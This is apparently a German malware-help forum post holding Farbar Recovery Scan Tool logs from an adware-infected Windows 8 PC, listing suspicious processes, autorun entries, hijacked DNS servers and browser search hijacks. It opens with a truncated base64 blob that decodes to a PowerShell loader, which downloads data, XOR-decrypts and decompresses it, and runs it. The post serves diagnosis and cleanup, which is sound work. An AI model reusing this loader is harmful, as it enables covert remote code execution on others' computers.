JAG4AUgBvAGwAZQAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEIAdQBpAGwAdABJAG4AUgBvAGwAZQBdACAAIgBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByACIAKQApAHsAYgByAGUAYQBrADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAHcAYwAoACQAdQByAGwAKQB7ACQAcgBxAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAcgBxAC4AVQBzAGUARABlAGYAYQB1AGwAdABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAPQAkAHQAcgB1AGUAOwAkAHIAcQAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAdQBzAGUAcgAtAGEAZwBlAG4AdAAiACwAIgBNAG8AegBpAGwAbABhAC8ANAAuADAAIAAoAGMAbwBtAHAAYQB0AGkAYgBsAGUAOwAgAE0AUwBJAEUAIAA3AC4AMAA7ACAAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAKQAiACkAOwByAGUAdAB1AHIAbgAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAByAHEALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAdQByAGwAKQApADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAGQAcwB0AHIAKAAkAHIAYQB3AGQAYQB0AGEAKQB7ACQAYgB0AD0AWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAYQB3AGQAYQB0AGEAKQA7ACQAZQB4AHQAPQAkAGIAdABbADAAXQA7ACQAawBlAHkAPQAkAGIAdABbADEAXQAgAC0AYgB4AG8AcgAgADEANwAwADsAZgBvAHIAKAAkAGkAPQAyADsAJABpACAALQBsAHQAIAAkAGIAdAAuAEwAZQBuAGcAdABoADsAJABpACsAKwApAHsAJABiAHQAWwAkAGkAXQA9ACgAJABiAHQAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACgAKAAkAGsAZQB5ACAAKwAgACQAaQApACAALQBiAGEAbgBkACAAMgA1ADUAKQApADsAfQAKAHIAZQB0AHUAcgBuACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEQAZQBmAGwAYQB0AGUAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACQAYgB0ACwAMgAsACgAJABiAHQALgBMAGUAbgBnAHQAaAAtACQAZQB4AHQAKQApACkALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwB9AAoAJABzAGMAPQBkAHMAdAByACgAdwBjACgAJABzAHUAcgBsACkAKQA7AEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgAC0AYwBvAG0AbQBhAG4AZAAgACIAJABzAGMAIgA7AH0AYwBhAHQAYwBoAHsAfQA7AGUAeABpAHQAIAAwADsA
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)
Task: C:\WINDOWS\Tasks\Go_Palikan.job => C:\Users\Manz\AppData\Local\{8396B~1\UNINST~1.EXE
Task: C:\WINDOWS\Tasks\Price Fountain.job => C:\Users\Manz\AppData\Roaming\PRICEF~1\UPDATE~1\UPDATE~1.EXE <==== ACHTUNG
==================== Verknüpfungen =============================
(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)
|
|
06.02.2016, 20:42
| #4 |
| | Windows 8.x mit einer großen Auswahl an Schädlingen FRST (Versuch 2): Code:
ATTFilter Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version:27-01-2016
durchgeführt von Manz (Administrator) auf HAUS (06-02-2016 19:37:08)
Gestartet von E:\
Geladene Profile: Manz (Verfügbare Profile: Manz & Administrator)
Platform: Windows 8 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 10 (Standard-Browser: "C:\Users\Manz\AppData\Local\BoBrowser\Application\bobrowser.exe" "%1")
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
==================== Prozesse (Nicht auf der Ausnahmeliste) =================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Qualcomm Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\AdminService.exe
(Acer Incorporated) C:\Program Files (x86)\Acer\Acer Cloud\CCDMonitorService.exe
(ClaraLabs) C:\Program Files (x86)\Common Files\ClaraUpdater\ClaraUpdater.exe
() C:\Windows\System32\DnsBlockUpdateSvc.exe
(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe
(Lavasoft Limited) C:\Program Files (x86)\Lavasoft\Web Companion\TcpService\2.3.4.7\LavasoftTcpService.exe
(McAfee, Inc.) C:\Program Files (x86)\McAfee\SiteAdvisor\mcsacore.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\mcsvchost\McSvHost.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
(DotC United Inc) C:\Program Files (x86)\MPC Cleaner\MPCProtectService.exe
() C:\Program Files (x86)\B5B53C54-1454245483-E111-8F5D-B888E3A0B275\knsbFC2B.tmpfs
(NTI Corporation) C:\Program Files (x86)\NTI\Acer Backup Manager\IScheduleSvc.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Dritek System INC.) C:\Windows\RfBtnSvc64.exe
() C:\Users\Manz\AppData\Local\B5B53C54-1454249191-E111-8F5D-B888E3A0B275\snscEFCA.tmp
() C:\Program Files\shopperz010220161759\Lugke.exe
(TU-Funs LIMITED) C:\ProgramData\2WdM2\WdMan.exe
() C:\Program Files (x86)\B5B53C54-1454245483-E111-8F5D-B888E3A0B275\hnsv4533.tmp
(Atheros) C:\Program Files (x86)\Qualcomm Atheros\Ath_WlanAgent.exe
() C:\Program Files (x86)\B5B53C54-1454245483-E111-8F5D-B888E3A0B275\jnsl20B1.tmp
(Client Connect LTD) C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\systemcore\mfefire.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
() C:\Program Files\shopperz010220161759\Irytutia.exe
() C:\Program Files\shopperz010220161759\csrcc.exe
(Microsoft Corporation) C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_6.2.9200.16384_none_622908ad510eb05b\TiWorker.exe
(Microsoft Corporation) C:\Windows\System32\msiexec.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\systemcore\mcshield.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
() C:\Users\Manz\AppData\Local\SearchModule\dblaunch.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
() C:\Program Files (x86)\securityutility\securityutility\2.0.0.1\Security Utilityupdt.exe
(Client Connect LTD) C:\Program Files (x86)\SearchProtect\SearchProtect\bin\cltmng.exe
() C:\Program Files\shopperz010220161759\Ratafah.exe
() C:\Program Files\shopperz010220161759\Ratafah64.exe
(Client Connect LTD) C:\Program Files (x86)\SearchProtect\UI\bin\cltmngui.exe
(DotC United Inc) C:\Program Files (x86)\MPC Cleaner\MPCTray.exe
(ult updater) C:\Program Files (x86)\SpaceSondPro_v53.12776\SpaceSondPro_Service.exe
() C:\Users\Manz\AppData\Local\SearchModule\2.8.9.113\DeskBar.exe
(Acer Incorporated) C:\Program Files\Acer\Acer Power Management\ePowerTray.exe
(blaim updater) C:\Program Files (x86)\SpaceSondPro_v53.12776\ioproduct.exe
(DotC United Inc) C:\Program Files (x86)\MPC Cleaner\MPCTray64.exe
() C:\Users\Manz\AppData\Local\gmsd_de_005010228\upgmsd_de_005010228.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16.4.4206.722_x64__8wekyb3d8bbwe\LiveComm.exe
(McAfee, Inc.) C:\Program Files\mcafee.com\agent\mcagent.exe
() C:\Program Files\Acer\Acer Instant Service\InstantUpdate\iuBrowserIEAgent.exe
() C:\Program Files\Acer\Acer Instant Service\InstantUpdate\iuEmailOutlookAgent.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(Acer Incorporated) C:\Program Files\Acer\Acer Power Management\ePowerSvc.exe
(Intel Corporation) C:\Windows\System32\igfxext.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(Acer Incorporated) C:\Program Files\Acer\Acer Power Management\ePowerEvent.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Qualcomm Atheros) C:\Program Files (x86)\Bluetooth Suite\BtTray.exe
(Atheros Communications) C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe
(Space Sound Pro) C:\Program Files\SpaceSoundPro\SpaceSoundPro.exe
(csdi ) C:\Users\Manz\AppData\Local\Temp\XXXO1K5S0ZW1\newversion.exe
() C:\Users\Manz\AppData\Local\Temp\is-5J9KF.tmp\newversion.tmp
(zik.mu) C:\Program Files\BubbleSound\3D BubbleSound.exe
(Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe
(Microsoft Corporation) C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
() C:\Users\Manz\AppData\Local\SearchModule\dblaunch.exe
(The Chromium Authors) C:\Users\Manz\AppData\Local\Chromium\Application\chrome.exe
() C:\Users\Manz\AppData\Local\SearchModule\2.8.9.113\DeskBar.exe
() C:\Users\Manz\AppData\Local\BoBrowser\Application\crash_service.exe
(The BoBrowser Authors) C:\Users\Manz\AppData\Local\BoBrowser\Application\bobrowser.exe
(NTI Corporation) C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe
(Professional Cleaning Software) C:\Program Files (x86)\Professional Cleaning Software\ProfessionalCleaningSoftware.exe
() C:\Program Files (x86)\gmsd_de_005010223\gmsd_de_005010223.exe
() C:\Program Files (x86)\rec_en_77\rec_en_77.exe
(The BoBrowser Authors) C:\Users\Manz\AppData\Local\BoBrowser\Application\bobrowser.exe
(1und1 Mail und Media GmbH) C:\Program Files (x86)\GMX MailCheck\IE\GMX_MailCheck_Broker.exe
() C:\Program Files (x86)\rec_de_184\rec_de_184.exe
(The BoBrowser Authors) C:\Users\Manz\AppData\Local\BoBrowser\Application\bobrowser.exe
(The BoBrowser Authors) C:\Users\Manz\AppData\Local\BoBrowser\Application\bobrowser.exe
(The BoBrowser Authors) C:\Users\Manz\AppData\Local\BoBrowser\Application\bobrowser.exe
(The BoBrowser Authors) C:\Users\Manz\AppData\Local\BoBrowser\Application\bobrowser.exe
(The BoBrowser Authors) C:\Users\Manz\AppData\Local\BoBrowser\Application\bobrowser.exe
(The BoBrowser Authors) C:\Users\Manz\AppData\Local\BoBrowser\Application\bobrowser.exe
(The BoBrowser Authors) C:\Users\Manz\AppData\Local\BoBrowser\Application\bobrowser.exe
(The BoBrowser Authors) C:\Users\Manz\AppData\Local\BoBrowser\Application\bobrowser.exe
() C:\Program Files (x86)\gmsd_de_005010228\gmsd_de_005010228.exe
(The Chromium Authors) C:\Users\Manz\AppData\Local\Chromium\Application\chrome.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(McAfee, Inc.) C:\Program Files\mcafee\virusscan\McVsShld.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\core\mchost.exe
==================== Registry (Nicht auf der Ausnahmeliste) ===========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)
HKLM\...\Run: [BtPreLoad] => C:\Program Files (x86)\Bluetooth Suite\BtPreLoad.exe [64640 2012-07-31] ()
HKLM\...\Run: [SpaceSoundPro] => C:\Program Files\SpaceSoundPro\SpaceSoundPro.exe [4203520 2015-08-03] (Space Sound Pro)
HKLM\...\Run: [3D BubbleSound] => C:\Program Files\BubbleSound\3D BubbleSound.exe [14115328 2015-01-09] (zik.mu)
HKLM\...\Run: [Sound+] => C:\Program Files\Sound+\Sound+.exe [3836416 2016-02-03] (Sound+)
HKLM\...\Run: [IDSCPRODUCT] => C:\Program Files (x86)\Max Driver Updater\\idscservice.exe [262656 2016-02-06] (Recommandations)
HKLM-x32\...\Run: [BakupManagerTray] => C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe [533568 2012-08-22] (NTI Corporation)
HKLM-x32\...\Run: [mcui_exe] => C:\Program Files\McAfee.com\Agent\mcagent.exe [1527896 2012-06-22] (McAfee, Inc.)
HKLM-x32\...\Run: [gmsd_de_005010223] => C:\Program Files (x86)\gmsd_de_005010223\gmsd_de_005010223.exe [3971760 2016-01-30] ()
HKLM-x32\...\Run: [rec_en_77] => C:\Program Files (x86)\rec_en_77\rec_en_77.exe [3971288 2016-01-30] ()
HKLM-x32\...\Run: [MailCheck IE Broker] => C:\Program Files (x86)\GMX MailCheck\IE\GMX_MailCheck_Broker.exe [2171456 2015-12-17] (1und1 Mail und Media GmbH)
HKLM-x32\...\Run: [rec_de_184] => C:\Program Files (x86)\rec_de_184\rec_de_184.exe [3972784 2016-01-31] ()
HKLM-x32\...\Run: [gmsd_de_005010228] => C:\Program Files (x86)\gmsd_de_005010228\gmsd_de_005010228.exe [3955888 2016-02-04] ()
HKLM-x32\...\RunOnce: [IOPROTECT] => C:\Program Files (x86)\SpaceSondPro_v53.12776\ioproduct_service.bat [164 2016-02-06] ()
HKLM-x32\...\RunOnce: [upgmsd_de_005010223.exe] => C:\Users\Manz\AppData\Local\gmsd_de_005010223\upgmsd_de_005010223.exe [3276976 2016-01-30] ()
HKLM-x32\...\RunOnce: [upgmsd_de_005010228.exe] => C:\Users\Manz\AppData\Local\gmsd_de_005010228\upgmsd_de_005010228.exe [3271856 2016-02-04] ()
Winlogon\Notify\igfxcui: C:\WINDOWS\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-19\...\RunOnce: [IsMyWinLockerReboot] => msiexec.exe /qn /x{voidguid}
HKU\S-1-5-20\...\RunOnce: [IsMyWinLockerReboot] => msiexec.exe /qn /x{voidguid}
HKU\S-1-5-21-2229505580-413648313-3343944023-1002\...\Run: [SearchModule] => C:\Users\Manz\AppData\Local\SearchModule\dblaunch.exe [391168 2015-12-01] ()
HKU\S-1-5-21-2229505580-413648313-3343944023-1002\...\Run: [Security Utility] => C:\Program Files (x86)\\securityutility\\securityutility\\2.0.0.1\securityutility.exe [290928 2016-01-31] (TODO: <Company name>)
HKU\S-1-5-21-2229505580-413648313-3343944023-1002\...\Run: [GoogleChromeAutoLaunch_E043F8592C2AE5BE99DCEC1B75F7941B] => C:\Users\Manz\AppData\Local\Chromium\Application\chrome.exe [667136 2015-08-04] (The Chromium Authors)
HKU\S-1-5-21-2229505580-413648313-3343944023-1002\...\Run: [CrashService] => C:\Users\Manz\AppData\Local\BoBrowser\Application\crash_service.exe [328824 2016-01-12] ()
HKU\S-1-5-21-2229505580-413648313-3343944023-1002\...\Run: [BoBrowser] => C:\Users\Manz\AppData\Local\BoBrowser\Application\bobrowser.exe [604784 2016-01-12] (The BoBrowser Authors)
HKU\S-1-5-18\...\RunOnce: [IsMyWinLockerReboot] => msiexec.exe /qn /x{voidguid}
AppInit_DLLs: C:\PROGRA~2\SearchProtect\SearchProtect\bin\VC64Loader.dll => C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC64Loader.dll [249104 2016-01-14] (Client Connect LTD)
AppInit_DLLs: C:\Windows\system32\nvinitx.dll => Keine Datei
AppInit_DLLs-x32: C:\PROGRA~2\SearchProtect\SearchProtect\bin\VC32Loader.dll => C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32Loader.dll [221456 2016-01-14] (Client Connect LTD)
AppInit_DLLs-x32: C:\Windows\SysWOW64\nvinit.dll => Keine Datei
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Acer Backup Manager Tray.lnk [2012-09-11]
ShortcutTarget: Acer Backup Manager Tray.lnk -> C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe (NTI Corporation)
GroupPolicy: Beschränkung - Chrome <======= ACHTUNG
CHR HKLM\SOFTWARE\Policies\Google: Beschränkung <======= ACHTUNG
==================== Internet (Nicht auf der Ausnahmeliste) ====================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)
Winsock: Catalog9 01 C:\WINDOWS\SysWOW64\LavasoftTcpService.dll [345360 2016-01-31] (Lavasoft Limited)
Winsock: Catalog9 02 C:\WINDOWS\SysWOW64\LavasoftTcpService.dll [345360 2016-01-31] (Lavasoft Limited)
Winsock: Catalog9 03 C:\WINDOWS\SysWOW64\LavasoftTcpService.dll [345360 2016-01-31] (Lavasoft Limited)
Winsock: Catalog9 04 C:\WINDOWS\SysWOW64\LavasoftTcpService.dll [345360 2016-01-31] (Lavasoft Limited)
Winsock: Catalog9 16 C:\WINDOWS\SysWOW64\LavasoftTcpService.dll [345360 2016-01-31] (Lavasoft Limited)
Winsock: Catalog9-x64 01 C:\WINDOWS\system32\LavasoftTcpService64.dll [425744 2016-01-31] (Lavasoft Limited)
Winsock: Catalog9-x64 02 C:\WINDOWS\system32\LavasoftTcpService64.dll [425744 2016-01-31] (Lavasoft Limited)
Winsock: Catalog9-x64 03 C:\WINDOWS\system32\LavasoftTcpService64.dll [425744 2016-01-31] (Lavasoft Limited)
Winsock: Catalog9-x64 04 C:\WINDOWS\system32\LavasoftTcpService64.dll [425744 2016-01-31] (Lavasoft Limited)
Winsock: Catalog9-x64 16 C:\WINDOWS\system32\LavasoftTcpService64.dll [425744 2016-01-31] (Lavasoft Limited)
Hosts: Es ist mehr als ein Eintrag in der Hosts Datei zu finden. Siehe Hosts-Bereich in Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.178.1
Tcpip\..\Interfaces\{0384D9E4-6354-47BD-B63F-154E6D937972}: [NameServer] 104.197.191.4
Tcpip\..\Interfaces\{32DA37AE-A04D-4044-B015-2EB1CB8AE9E5}: [NameServer] 104.197.191.4
Tcpip\..\Interfaces\{32DA37AE-A04D-4044-B015-2EB1CB8AE9E5}: [DhcpNameServer] 192.168.178.1
Tcpip\..\Interfaces\{96CC4FD2-7AB2-4A4F-B6CB-52F22B8E3A50}: [NameServer] 104.197.191.4
Tcpip\..\Interfaces\{97e1de57-d6fa-11e1-be62-806e6f6e6963}: [NameServer] 104.197.191.4
Tcpip\..\Interfaces\{A10F49CF-5495-47E9-9E07-DCA82E339E8D}: [NameServer] 104.197.191.4
Tcpip\..\Interfaces\{A10F49CF-5495-47E9-9E07-DCA82E339E8D}: [DhcpNameServer] 150.200.3.1
Tcpip\..\Interfaces\{C02CAB3E-C922-4371-A1DD-E72CF76EF979}: [NameServer] 104.197.191.4
Tcpip\..\Interfaces\{FF696C85-800A-4636-AE7A-2631D28B75AD}: [NameServer] 104.197.191.4
Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.palikan.com/?f=1&a=bfp_cmi_16_04&cd=2XzuyEtN2Y1L1Qzu0Bzzzzzz0EtA0AtD0BtByByDyC0BtBzytN0D0Tzu0StCyEzytCtN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtBtN1L1G1B1V1N2Y1L1Qzu2SyEzyzytC0BzzzzyEtGtC0Ezy0AtG0EyDyC0BtGyBtCyDtAtGyEzy0CyDtB0A0D0E0C0A0EtD2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyB0FyE0A0ByEtCyBtGtDzy0A0AtGyE0ByBzytG0AtDtCyEtGyC0D0CtC0C0BtD0ByDyDzz0D2QtN0A0LzuyE&cr=512840388&ir=
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.palikan.com/?f=1&a=bfp_cmi_16_04&cd=2XzuyEtN2Y1L1Qzu0Bzzzzzz0EtA0AtD0BtByByDyC0BtBzytN0D0Tzu0StCyEzytCtN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtBtN1L1G1B1V1N2Y1L1Qzu2SyEzyzytC0BzzzzyEtGtC0Ezy0AtG0EyDyC0BtGyBtCyDtAtGyEzy0CyDtB0A0D0E0C0A0EtD2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyB0FyE0A0ByEtCyBtGtDzy0A0AtGyE0ByBzytG0AtDtCyEtGyC0D0CtC0C0BtD0ByDyDzz0D2QtN0A0LzuyE&cr=512840388&ir=
HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://acer13.msn.com
HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://acer13.msn.com
SearchScopes: HKLM -> {140E657E-89B5-411B-951A-24698B1E79EF} URL = hxxp://www.palikan.com/results.php?f=4&a=bfp_cmi_16_04&cd=2XzuyEtN2Y1L1Qzu0Bzzzzzz0EtA0AtD0BtByByDyC0BtBzytN0D0Tzu0StCyEzytCtN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtBtN1L1G1B1V1N2Y1L1Qzu2SyEzyzytC0BzzzzyEtGtC0Ezy0AtG0EyDyC0BtGyBtCyDtAtGyEzy0CyDtB0A0D0E0C0A0EtD2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyB0FyE0A0ByEtCyBtGtDzy0A0AtGyE0ByBzytG0AtDtCyEtGyC0D0CtC0C0BtD0ByDyDzz0D2QtN0A0LzuyE&cr=512840388&ir=&q={searchTerms}
SearchScopes: HKLM -> {6586d803-df30-46d3-a89a-4136c8571d45} URL = hxxp://www.palikan.com/results.php?f=4&a=bfp_cmi_16_04&cd=2XzuyEtN2Y1L1Qzu0Bzzzzzz0EtA0AtD0BtByByDyC0BtBzytN0D0Tzu0StCyEzytCtN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtBtN1L1G1B1V1N2Y1L1Qzu2SyEzyzytC0BzzzzyEtGtC0Ezy0AtG0EyDyC0BtGyBtCyDtAtGyEzy0CyDtB0A0D0E0C0A0EtD2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyB0FyE0A0ByEtCyBtGtDzy0A0AtGyE0ByBzytG0AtDtCyEtGyC0D0CtC0C0BtD0ByDyDzz0D2QtN0A0LzuyE&cr=512840388&ir=&q={searchTerms}
SearchScopes: HKU\S-1-5-21-2229505580-413648313-3343944023-1002 -> DefaultScope {140E657E-89B5-411B-951A-24698B1E79EF} URL = hxxp://www.palikan.com/results.php?f=4&a=bfp_cmi_16_04&cd=2XzuyEtN2Y1L1Qzu0Bzzzzzz0EtA0AtD0BtByByDyC0BtBzytN0D0Tzu0StCyEzytCtN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtBtN1L1G1B1V1N2Y1L1Qzu2SyEzyzytC0BzzzzyEtGtC0Ezy0AtG0EyDyC0BtGyBtCyDtAtGyEzy0CyDtB0A0D0E0C0A0EtD2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyB0FyE0A0ByEtCyBtGtDzy0A0AtGyE0ByBzytG0AtDtCyEtGyC0D0CtC0C0BtD0ByDyDzz0D2QtN0A0LzuyE&cr=512840388&ir=&q={searchTerms}
SearchScopes: HKU\S-1-5-21-2229505580-413648313-3343944023-1002 -> {015DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = hxxp://www.trovi.com/Results.aspx?gd=&ctid=CT3321538&octid=EB_ORIGINAL_CTID&ISID=MDEC25DAF-A6CE-4B57-9019-93B3CF2948FC&SearchSource=58&CUI=&UM=8&UP=SPF3E97A65-0079-42ED-94F3-4AC0FA91C53A&D=020616&q={searchTerms}&SSPV=
SearchScopes: HKU\S-1-5-21-2229505580-413648313-3343944023-1002 -> {140E657E-89B5-411B-951A-24698B1E79EF} URL = hxxp://www.palikan.com/results.php?f=4&a=bfp_cmi_16_04&cd=2XzuyEtN2Y1L1Qzu0Bzzzzzz0EtA0AtD0BtByByDyC0BtBzytN0D0Tzu0StCyEzytCtN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtBtN1L1G1B1V1N2Y1L1Qzu2SyEzyzytC0BzzzzyEtGtC0Ezy0AtG0EyDyC0BtGyBtCyDtAtGyEzy0CyDtB0A0D0E0C0A0EtD2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyB0FyE0A0ByEtCyBtGtDzy0A0AtGyE0ByBzytG0AtDtCyEtGyC0D0CtC0C0BtD0ByDyDzz0D2QtN0A0LzuyE&cr=512840388&ir=&q={searchTerms}
SearchScopes: HKU\S-1-5-21-2229505580-413648313-3343944023-1002 -> {2DEFAF55-1981-4273-B141-DFD5ACCEBCB2} URL = hxxp://go.1und1.de/tb/ie_searchplugin/?q={searchTerms}&enc=UTF-8
SearchScopes: HKU\S-1-5-21-2229505580-413648313-3343944023-1002 -> {31E15B1A-A8DD-4EE8-B691-0B5EF63443F3} URL = hxxp://www-searching.com/s.ashx?prd=opensearch&q={searchTerms}&s=G26zftpbl2,d5d1e8af-1fcd-4d24-99e0-065c0a95ed60,
SearchScopes: HKU\S-1-5-21-2229505580-413648313-3343944023-1002 -> {41A2183B-D46F-4ACB-9F07-A0F2C3313AE2} URL = hxxp://go.mail.com/tb/en-us/ie_searchplugin/?q={searchTerms}&enc=UTF-8
SearchScopes: HKU\S-1-5-21-2229505580-413648313-3343944023-1002 -> {6586d803-df30-46d3-a89a-4136c8571d45} URL = hxxp://go.gmx.de/tb/ie_searchplugin/?q={searchTerms}&enc=UTF-8
SearchScopes: HKU\S-1-5-21-2229505580-413648313-3343944023-1002 -> {B0EC8E09-9A12-42A0-8972-CB73908A487E} URL = hxxp://go.web.de/tb/ie_searchplugin/?q={searchTerms}&enc=UTF-8
SearchScopes: HKU\S-1-5-21-2229505580-413648313-3343944023-1002 -> {B1AEE09D-45BC-480C-A2DF-7253EBC7E1F2} URL =
BHO: CIESpeechBHO Class -> {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} -> C:\Program Files (x86)\Bluetooth Suite\IEPlugIn.dll [2012-07-31] (Qualcomm Atheros Commnucations)
BHO: GMX MailCheck BHO -> {BF42D4A8-016E-4fcd-B1EB-837659FD77C6} -> C:\Program Files\GMX MailCheck\IE\GMX_MailCheck.dll [2015-12-17] (1und1 Mail und Media GmbH)
BHO: DownloadProtect Extension -> {C654F3FE-8E84-4BB7-87CF-8D9171FC3C73} -> C:\Program Files\{4CC6E919-6ABD-43C0-AE89-BDF20C2F91FB}\{D5BAFF0D-E5C2-45E0-BD9E-8E46701FB258}.bin [2016-02-06] (Download Protect)
BHO: shopperz010220161759 -> {F64D5F15-81C2-4573-814A-31A0BF41A433} -> C:\Program Files\shopperz010220161759\Lonbee64.dll [2016-02-01] ()
BHO-x32: FunFeedr -> {11B16A3D-F03E-4565-A532-E66B219C9B03} -> C:\Users\Manz\AppData\Local\ext_funfeedr\ext_funfeedr.dll [2015-03-30] ()
BHO-x32: GMX MailCheck BHO -> {BF42D4A8-016E-4fcd-B1EB-837659FD77C6} -> C:\Program Files (x86)\GMX MailCheck\IE\GMX_MailCheck.dll [2015-12-17] (1und1 Mail und Media GmbH)
BHO-x32: DownloadProtect Extension -> {C654F3FE-8E84-4BB7-87CF-8D9171FC3C73} -> C:\Program Files (x86)\{3D935F8C-7FB2-48EB-BE01-3C05181A9F03}\{AEA80DD1-3796-419E-ACF1-621F4DEE71A5}.bin [2016-02-06] (Download Protect)
BHO-x32: shopperz010220161759 -> {F64D5F15-81C2-4573-814A-31A0BF41A433} -> C:\Program Files\shopperz010220161759\Lonbee.dll [2016-02-01] ()
Toolbar: HKLM - GMX MailCheck - {C424171E-592A-415a-9EB1-DFD6D95D3530} - C:\Program Files\GMX MailCheck\IE\GMX_MailCheck.dll [2015-12-17] (1und1 Mail und Media GmbH)
